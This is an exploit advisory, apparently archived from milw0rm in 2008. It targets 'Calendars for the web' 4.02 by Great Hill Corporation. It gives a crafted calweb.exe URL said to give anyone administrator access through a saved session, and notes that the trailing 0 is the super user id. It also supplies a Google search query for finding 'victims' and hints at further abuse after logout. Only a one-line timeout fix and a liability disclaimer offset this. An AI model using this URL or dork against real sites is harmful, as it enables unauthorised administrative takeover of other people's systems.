43 lines
No EOL
1.9 KiB
Text
43 lines
No EOL
1.9 KiB
Text
*******************************************************
|
|
*Exploit discovered by SecVuln from http://secvuln.com*
|
|
*Come join our clan! *
|
|
*contact secvuln@secvuln.com *
|
|
*******************************************************
|
|
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
Author == SecVuln
|
|
Version == 4.02
|
|
Software == Calendars for the web by great hill corporation
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
|
|
Calendars for the web has a vulnerability in the administration page.
|
|
The page saves the past session, so that anyone navigating to the page has
|
|
admin access.
|
|
|
|
Exploit:
|
|
|
|
Before attack: target.com/calendarWeb/cgi-bin/calweb/calweb.exe
|
|
|
|
After attack:
|
|
target.com/calendarWeb/cgi-bin/calweb/calweb.exe?cal=default&vt=6&cmd=900&act=0&dd=2008;10;03;12;00;00;&app=0&format=21x05i9r9s|SnriTmOdoaT&lastcmd=0
|
|
|
|
Example:
|
|
target.com/calendarWeb/cgi-bin/calweb/calweb.exe?cal=default&vt=6&cmd=900&act=0&dd=2008;10;03;12;00;00;&app=0&format=21x05i9r9s|SnriTmOdoaT&lastcmd=0
|
|
|
|
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
|
|
how to fix: set time out for login to five minutes !
|
|
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
|
|
|
|
A Google query can find a couple pages of victims: inurl:calweb/calweb.exe
|
|
|
|
Further hacks: if they disable the timeout you can still log in right after
|
|
they log out... You could probaly do something with that
|
|
Also the 0 at the ending is the administrator (super user) id.
|
|
|
|
/////////////////////////////////////////////////////////////////
|
|
I take no responsability for the misuse of the information.//////
|
|
Author will not be held liable for any damages //////
|
|
COME CHECK MY SITE OUT WWW.SECVULN.COM //////
|
|
////////////////////////////////////////////////////////////////
|
|
|
|
# milw0rm.com [2008-10-16] |